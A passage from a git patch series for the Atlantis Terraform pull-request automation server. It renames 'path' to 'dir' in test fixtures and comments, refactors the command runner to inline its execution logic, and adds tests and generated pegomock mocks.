 		CommentArgs: []string{"comment", "args"},
 	}, []string{"extra", "args"}, "/path")
@@ -255,7 +255,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	output, err := s.Run(models.ProjectCommandContext{
 		Log:         logger,
 		Workspace:   "workspace",
-		RepoRelPath: ".",
+		RepoRelDir:  ".",
 		User:        models.User{Username: "username"},
 		CommentArgs: []string{"comment", "args"},
 	}, []string{"extra", "args"}, tmpDir)
@@ -287,7 +287,7 @@ func TestRun_UsesDiffPathForProject(t *testing.T) {
 	output, err := s.Run(models.ProjectCommandContext{
 		Log:         logger,
 		Workspace:   "default",
-		RepoRelPath: ".",
+		RepoRelDir:  ".",
 		User:        models.User{Username: "username"},
 		CommentArgs: []string{"comment", "args"},
 		ProjectConfig: &valid.Project{
diff --git a/server/locks_controller.go b/server/locks_controller.go
index d345b68411..abeb490c05 100644
--- a/server/locks_controller.go
+++ b/server/locks_controller.go
@@ -85,7 +85,7 @@ func (l *LocksController) DeleteLock(w http.ResponseWriter, r *http.Request) {
 	}
 
 	// Once the lock has been deleted, comment back on the pull request.
-	comment := fmt.Sprintf("**Warning**: The plan for path: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
+	comment := fmt.Sprintf("**Warning**: The plan for dir: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
 		"To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
 	// NOTE: Because BaseRepo was added to the PullRequest model later, previous
 	// installations of Atlantis will have locks in their DB that do not have
diff --git a/server/locks_controller_test.go b/server/locks_controller_test.go
index e78f356b21..fe26ba7cc4 100644
--- a/server/locks_controller_test.go
+++ b/server/locks_controller_test.go
@@ -234,6 +234,6 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
 	lc.DeleteLock(w, req)
 	responseContains(t, w, http.StatusOK, "Deleted lock id \"id\"")
 	cp.VerifyWasCalled(Once()).CreateComment(pull.BaseRepo, pull.Num,
-		"**Warning**: The plan for path: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
+		"**Warning**: The plan for dir: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
 			"To `apply` you must run `plan` again.")
 }
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
index f9a2c26ebc..295fbdddae 100644
--- a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
@@ -1,8 +1,8 @@
 Ran Plan for 2 projects:
-1. workspace: `default` path: `staging`
-1. workspace: `default` path: `production`
+1. workspace: `default` dir: `staging`
+1. workspace: `default` dir: `production`
 
-### 1. workspace: `default` path: `staging`
+### 1. workspace: `default` dir: `staging`
 ```diff
 Refreshing Terraform state in-memory prior to plan...
 The refreshed state will be used to calculate this plan, but will not be
@@ -25,7 +25,7 @@ Plan: 1 to add, 0 to change, 0 to destroy.
 
 * To **discard** this plan click [here](lock-url).
 ---
-### 2. workspace: `default` path: `production`
+### 2. workspace: `default` dir: `production`
 ```diff
 Refreshing Terraform state in-memory prior to plan...
 The refreshed state will be used to calculate this plan, but will not be
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
index 9712df1ee2..9c553b9717 100644
--- a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
@@ -1,4 +1,4 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/production` workspace: `default`
-- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
+- dir: `production` workspace: `default`
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act
deleted file mode 100644
index f4282d489d..0000000000
--- a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act
+++ /dev/null
@@ -1,7 +0,0 @@
-Ran Apply in dir: `staging` workspace: `default`
-**Apply Error**
-```
-no plan found at path "staging" and workspace "default"–did you run plan?
-```
-
-
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
index 9712df1ee2..9c553b9717 100644
--- a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
@@ -1,4 +1,4 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/production` workspace: `default`
-- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
+- dir: `production` workspace: `default`
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act
deleted file mode 100644
index 4a70e47f39..0000000000
--- a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act
+++ /dev/null
@@ -1,3 +0,0 @@
-Locks and plans deleted for the projects and workspaces modified in this pull request:
-
-- path: `runatlantis/atlantis-tests/production` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
index 49c8312cd7..95dde446ff 100644
--- a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge.txt b/server/testfixtures/test-repos/modules/exp-output-merge.txt
index b64103b412..9080217904 100644
--- a/server/testfixtures/test-repos/modules/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/modules/exp-output-merge.txt
@@ -1,4 +1,4 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/staging` workspace: `default`
-- path: `runatlantis/atlantis-tests/.` workspace: `default`
+- dir: `staging` workspace: `default`
+- dir: `.` workspace: `default`
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act
deleted file mode 100644
index 06b8c8c59d..0000000000
--- a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act
+++ /dev/null
@@ -1,31 +0,0 @@
-Ran Plan in dir: `staging` workspace: `default`
-**Plan Error**
-```
-exit status 1: running "sh -c terraform init -no-color" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/767048561/repos/runatlantis/atlantis-tests/2/default/staging": 
-Initializing modules...
-- module.null
-  Getting source "../modules/null"
-
-Initializing provider plugins...
-- Checking for available provider plugins on https://releases.hashicorp.com...
-
-Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: dial tcp: lookup releases.hashicorp.com on 8.8.4.4:53: read udp 172.16.133.24:59000->8.8.4.4:53: i/o timeout.
-
-Terraform analyses the configuration and state and automatically downloads
-plugins for the providers used. However, when attempting to download this
-plugin an unexpected error occured.
-
-This may be caused if for some reason Terraform is unable to reach the
-plugin repository. The repository may be unreachable if access is blocked
-by a firewall.
-
-If automatic installation is not possible or desirable in your environment,
-you may alternatively manually install plugins by downloading a suitable
-distribution package and placing the plugin's executable file in the
-following directory:
-    terraform.d/plugins/darwin_amd64
-
-
-```
-
-
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
index 6611b1b70b..b539452a7f 100644
--- a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
@@ -1,8 +1,8 @@
 Ran Plan for 2 projects:
-1. workspace: `default` path: `.`
-1. workspace: `staging` path: `.`
+1. workspace: `default` dir: `.`
+1. workspace: `staging` dir: `.`
 
-### 1. workspace: `default` path: `.`
+### 1. workspace: `default` dir: `.`
 ```diff
 Refreshing Terraform state in-memory prior to plan...
 The refreshed state will be used to calculate this plan, but will not be
@@ -25,7 +25,7 @@ Plan: 1 to add, 0 to change, 0 to destroy.
 
 * To **discard** this plan click [here](lock-url).
 ---
-### 2. workspace: `staging` path: `.`
+### 2. workspace: `staging` dir: `.`
 ```diff
 Refreshing Terraform state in-memory prior to plan...
 The refreshed state will be used to calculate this plan, but will not be
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
index 0abe4f2f13..9ac6047224 100644
--- a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `staging`
\ No newline at end of file
+- dir: `.` workspaces: `default`, `staging`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
index 5489b642a8..dad5ee4ab8 100644
--- a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace`
\ No newline at end of file
+- dir: `.` workspaces: `default`, `new_workspace`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge.txt b/server/testfixtures/test-repos/simple/exp-output-merge.txt
index c09b916bd6..70df2f2518 100644
--- a/server/testfixtures/test-repos/simple/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-merge.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/.` workspace: `default`
\ No newline at end of file
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
index c09b916bd6..70df2f2518 100644
--- a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/.` workspace: `default`
\ No newline at end of file
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
index d51e3ff700..abf01fb6fc 100644
--- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
@@ -1,8 +1,8 @@
 Ran Plan for 2 projects:
-1. workspace: `default` path: `.`
-1. workspace: `default` path: `.`
+1. workspace: `default` dir: `.`
+1. workspace: `default` dir: `.`
 
-### 1. workspace: `default` path: `.`
+### 1. workspace: `default` dir: `.`
 ```diff
 Refreshing Terraform state in-memory prior to plan...
 The refreshed state will be used to calculate this plan, but will not be
@@ -25,7 +25,7 @@ Plan: 1 to add, 0 to change, 0 to destroy.
 
 * To **discard** this plan click [here](lock-url).
 ---
-### 2. workspace: `default` path: `.`
+### 2. workspace: `default` dir: `.`
 ```diff
 Refreshing Terraform state in-memory prior to plan...
 The refreshed state will be used to calculate this plan, but will not be
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
index c09b916bd6..70df2f2518 100644
--- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
@@ -1,3 +1,3 @@
 Locks and plans deleted for the projects and workspaces modified in this pull request:
 
-- path: `runatlantis/atlantis-tests/.` workspace: `default`
\ No newline at end of file
+- dir: `.` workspace: `default`
\ No newline at end of file

From 9e7509aeee4f3d1511eefb938e9f082c69ed72c1 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 19:10:10 +0200
Subject: [PATCH 57/69] Test command runner

---
 server/events/command_runner.go               | 120 +++++++++---------
 server/events/command_runner_test.go          | 120 ++++++++----------
 .../matchers/events_projectcommandresult.go   |  20 +++
 .../mocks/mock_project_command_runner.go      | 116 +++++++++++++++++
 server/events/project_command_runner.go       |  24 ++--
 server/events_controller_e2e_test.go          |   2 +-
 server/server.go                              |   2 +-
 7 files changed, 270 insertions(+), 134 deletions(-)
 create mode 100644 server/events/mocks/matchers/events_projectcommandresult.go
 create mode 100644 server/events/mocks/mock_project_command_runner.go

diff --git a/server/events/command_runner.go b/server/events/command_runner.go
index 5297546a73..04fbb7f129 100644
--- a/server/events/command_runner.go
+++ b/server/events/command_runner.go
@@ -68,7 +68,7 @@ type DefaultCommandRunner struct {
 	// how to enable this functionality.
 	AllowForkPRsFlag      string
 	ProjectCommandBuilder ProjectCommandBuilder
-	ProjectCommandRunner  *ProjectCommandRunner
+	ProjectCommandRunner  ProjectCommandRunner
 }
 
 func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
@@ -80,23 +80,30 @@ func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo
 		HeadRepo: headRepo,
 		BaseRepo: baseRepo,
 	}
-	runFn := func() ([]ProjectResult, error) {
-		projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx)
-		if err != nil {
-			return nil, err
-		}
-		var results []ProjectResult
-		for _, cmd := range projectCmds {
-			res := c.ProjectCommandRunner.Plan(cmd)
-			results = append(results, ProjectResult{
-				ProjectCommandResult: res,
-				RepoRelDir:           cmd.RepoRelDir,
-				Workspace:            cmd.Workspace,
-			})
-		}
-		return results, nil
+	defer c.logPanics(ctx)
+	if !c.validateCtxAndComment(ctx) {
+		return
+	}
+	if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, Plan); err != nil {
+		ctx.Log.Warn("unable to update commit status: %s", err)
 	}
-	c.run(ctx, AutoplanCommand{}, runFn)
+
+	projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx)
+	if err != nil {
+		c.updatePull(ctx, AutoplanCommand{}, CommandResult{Error: err})
+		return
+	}
+
+	var results []ProjectResult
+	for _, cmd := range projectCmds {
+		res := c.ProjectCommandRunner.Plan(cmd)
+		results = append(results, ProjectResult{
+			ProjectCommandResult: res,
+			RepoRelDir:           cmd.RepoRelDir,
+			Workspace:            cmd.Workspace,
+		})
+	}
+	c.updatePull(ctx, AutoplanCommand{}, CommandResult{ProjectResults: results})
 }
 
 // RunCommentCommand executes the command.
@@ -132,33 +139,46 @@ func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHead
 		HeadRepo: headRepo,
 		BaseRepo: baseRepo,
 	}
+	defer c.logPanics(ctx)
+
+	if !c.validateCtxAndComment(ctx) {
+		return
+	}
 
-	runFn := func() ([]ProjectResult, error) {
-		var result ProjectCommandResult
-		switch cmd.Name {
-		case Plan:
-			projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd)
-			if err != nil {
-				return nil, err
-			}
-			result = c.ProjectCommandRunner.Plan(projectCmd)
-		case Apply:
-			projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd)
-			if err != nil {
-				return nil, err
-			}
-			result = c.ProjectCommandRunner.Apply(projectCmd)
-		default:
-			ctx.Log.Err("failed to determine desired command, neither plan nor apply")
+	if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, cmd.CommandName()); err != nil {
+		ctx.Log.Warn("unable to update commit status: %s", err)
+	}
+
+	var result ProjectCommandResult
+	switch cmd.Name {
+	case Plan:
+		projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd)
+		if err != nil {
+			c.updatePull(ctx, cmd, CommandResult{Error: err})
+			return
 		}
-		return []ProjectResult{{
-			RepoRelDir:           cmd.RepoRelDir,
-			Workspace:            cmd.Workspace,
-			ProjectCommandResult: result,
-		}}, nil
+		result = c.ProjectCommandRunner.Plan(projectCmd)
+	case Apply:
+		projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd)
+		if err != nil {
+			c.updatePull(ctx, cmd, CommandResult{Error: err})
+			return
+		}
+		result = c.ProjectCommandRunner.Apply(projectCmd)
+	default:
+		ctx.Log.Err("failed to determine desired command, neither plan nor apply")
+		return
 	}
 
-	c.run(ctx, cmd, runFn)
+	c.updatePull(
+		ctx,
+		cmd,
+		CommandResult{
+			ProjectResults: []ProjectResult{{
+				RepoRelDir:           cmd.RepoRelDir,
+				Workspace:            cmd.Workspace,
+				ProjectCommandResult: result,
+			}}})
 }
 
 func (c *DefaultCommandRunner) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
@@ -208,26 +228,6 @@ func (c *DefaultCommandRunner) validateCtxAndComment(ctx *CommandContext) bool {
 	return true
 }
 
-func (c *DefaultCommandRunner) run(ctx *CommandContext, command CommandInterface, commandRunner func() ([]ProjectResult, error)) {
-	defer c.logPanics(ctx)
-
-	if !c.validateCtxAndComment(ctx) {
-		return
-	}
-
-	ctx.Log.Debug("updating commit status to pending")
-	if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, command.CommandName()); err != nil {
-		ctx.Log.Warn("unable to update commit status: %s", err)
-	}
-
-	results, err := commandRunner()
-	if err != nil {
-		c.updatePull(ctx, command, CommandResult{Error: err})
-		return
-	}
-	c.updatePull(ctx, command, CommandResult{ProjectResults: results})
-}
-
 func (c *DefaultCommandRunner) updatePull(ctx *CommandContext, command CommandInterface, res CommandResult) {
 	// Log if we got any errors or failures.
 	if res.Error != nil {
diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
index 3367806eb9..5f0d2ce4c0 100644
--- a/server/events/command_runner_test.go
+++ b/server/events/command_runner_test.go
@@ -39,21 +39,21 @@ var vcsClient *vcsmocks.MockClientProxy
 var ghStatus *mocks.MockCommitStatusUpdater
 var githubGetter *mocks.MockGithubPullGetter
 var gitlabGetter *mocks.MockGitlabMergeRequestGetter
-var workspaceLocker *mocks.MockWorkingDirLocker
 var ch events.DefaultCommandRunner
 var logBytes *bytes.Buffer
+var projectCommandRunner *mocks.MockProjectCommandRunner
 
 func setup(t *testing.T) {
 	RegisterMockTestingT(t)
 	projectCommandBuilder = mocks.NewMockProjectCommandBuilder()
 	eventParsing = mocks.NewMockEventParsing()
 	ghStatus = mocks.NewMockCommitStatusUpdater()
-	workspaceLocker = mocks.NewMockWorkingDirLocker()
 	vcsClient = vcsmocks.NewMockClientProxy()
 	githubGetter = mocks.NewMockGithubPullGetter()
 	gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
 	logger := logmocks.NewMockSimpleLogging()
 	logBytes = new(bytes.Buffer)
+	projectCommandRunner := mocks.NewMockProjectCommandRunner()
 	When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
 	ch = events.DefaultCommandRunner{
 		VCSClient:                vcsClient,
@@ -66,6 +66,7 @@ func setup(t *testing.T) {
 		AllowForkPRs:          false,
 		AllowForkPRsFlag:      "allow-fork-prs-flag",
 		ProjectCommandBuilder: projectCommandBuilder,
+		ProjectCommandRunner:  projectCommandRunner,
 	}
 }
 
@@ -156,65 +157,56 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) {
 	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
 }
 
-//func TestRunCommentCommand_FullRun(t *testing.T) {
-//	t.Log("when running a plan, apply should comment")
-//	pull := &github.PullRequest{
-//		State: github.String("closed"),
-//	}
-//	cmdResult := events.CommandResult{}
-//	for _, c := range []events.CommandName{events.Plan, events.Apply} {
-//		setup(t)
-//		cmd := events.CommentCommand{
-//			Name:      c,
-//			WorkingDir: "workspace",
-//		}
-//		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-//		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-//		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)).ThenReturn(true)
-//		switch c {
-//		case events.Plan:
-//			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
-//		case events.Apply:
-//			When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
-//		}
-//
-//		ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-//
-//		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-//		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-//		Equals(t, cmdResult, response)
-//		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-//		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)
-//	}
-//}
-
-//func TestRunCommentCommand_ForkPREnabled(t *testing.T) {
-//	t.Log("when running a plan on a fork PR, it should succeed")
-//	setup(t)
-//
-//	// Enable forked PRs.
-//	ch.AllowForkPRs = true
-//	defer func() { ch.AllowForkPRs = false }() // Reset after test.
-//
-//	var pull github.PullRequest
-//	cmdResponse := events.CommandResult{}
-//	cmd := events.CommentCommand{
-//		Name:      events.Plan,
-//		WorkingDir: "workspace",
-//	}
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-//	headRepo := fixtures.GithubRepo
-//	headRepo.FullName = "forkrepo/atlantis"
-//	headRepo.Owner = "forkrepo"
-//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
-//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)).ThenReturn(true)
-//	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-//
-//	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
-//
-//	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-//	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-//	Equals(t, cmdResponse, response)
-//	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-//	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)
-//}
+func TestRunCommentCommand_FullRun(t *testing.T) {
+	pull := &github.PullRequest{
+		State: github.String("closed"),
+	}
+	expCmdResult := events.CommandResult{
+		ProjectResults: []events.ProjectResult{
+			{
+				RepoRelDir: ".",
+				Workspace:  "default",
+			},
+		},
+	}
+	for _, c := range []events.CommandName{events.Plan, events.Apply} {
+		setup(t)
+		cmd := events.NewCommentCommand(".", nil, c, false, "default", "")
+		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GithubRepo, nil)
+
+		cmdCtx := models.ProjectCommandContext{RepoRelDir: "."}
+		switch c {
+		case events.Plan:
+			When(projectCommandBuilder.BuildPlanCommand(matchers.AnyPtrToEventsCommandContext(), matchers.AnyPtrToEventsCommentCommand())).ThenReturn(cmdCtx, nil)
+		case events.Apply:
+			When(projectCommandBuilder.BuildApplyCommand(matchers.AnyPtrToEventsCommandContext(), matchers.AnyPtrToEventsCommentCommand())).ThenReturn(cmdCtx, nil)
+		}
+
+		ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, cmd)
+
+		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, c)
+		_, _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+		Equals(t, expCmdResult, response)
+		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+	}
+}
+
+func TestRunAutoplanCommands(t *testing.T) {
+	expCmdResult := events.CommandResult{
+		ProjectResults: []events.ProjectResult{
+			{
+				RepoRelDir: ".",
+				Workspace:  "default",
+			},
+		},
+	}
+	setup(t)
+	When(projectCommandBuilder.BuildAutoplanCommands(matchers.AnyPtrToEventsCommandContext())).ThenReturn([]models.ProjectCommandContext{{RepoRelDir: ".", Workspace: "default"}}, nil)
+	ch.RunAutoplanCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.Pull, fixtures.User)
+
+	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)
+	_, _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+	Equals(t, expCmdResult, response)
+	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+}
diff --git a/server/events/mocks/matchers/events_projectcommandresult.go b/server/events/mocks/matchers/events_projectcommandresult.go
new file mode 100644
index 0000000000..522a4ccf83
--- /dev/null
+++ b/server/events/mocks/matchers/events_projectcommandresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsProjectCommandResult() events.ProjectCommandResult {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.ProjectCommandResult))(nil)).Elem()))
+	var nullValue events.ProjectCommandResult
+	return nullValue
+}
+
+func EqEventsProjectCommandResult(value events.ProjectCommandResult) events.ProjectCommandResult {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue events.ProjectCommandResult
+	return nullValue
+}
diff --git a/server/events/mocks/mock_project_command_runner.go b/server/events/mocks/mock_project_command_runner.go
new file mode 100644
index 0000000000..cf5555e8d3
--- /dev/null
+++ b/server/events/mocks/mock_project_command_runner.go
@@ -0,0 +1,116 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandRunner)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockProjectCommandRunner struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectCommandRunner() *MockProjectCommandRunner {
+	return &MockProjectCommandRunner{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectCommandRunner) Plan(ctx models.ProjectCommandContext) events.ProjectCommandResult {
+	params := []pegomock.Param{ctx}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("Plan", params, []reflect.Type{reflect.TypeOf((*events.ProjectCommandResult)(nil)).Elem()})
+	var ret0 events.ProjectCommandResult
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(events.ProjectCommandResult)
+		}
+	}
+	return ret0
+}
+
+func (mock *MockProjectCommandRunner) Apply(ctx models.ProjectCommandContext) events.ProjectCommandResult {
+	params := []pegomock.Param{ctx}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("Apply", params, []reflect.Type{reflect.TypeOf((*events.ProjectCommandResult)(nil)).Elem()})
+	var ret0 events.ProjectCommandResult
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(events.ProjectCommandResult)
+		}
+	}
+	return ret0
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalledOnce() *VerifierProjectCommandRunner {
+	return &VerifierProjectCommandRunner{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandRunner {
+	return &VerifierProjectCommandRunner{mock, invocationCountMatcher, nil}
+}
+
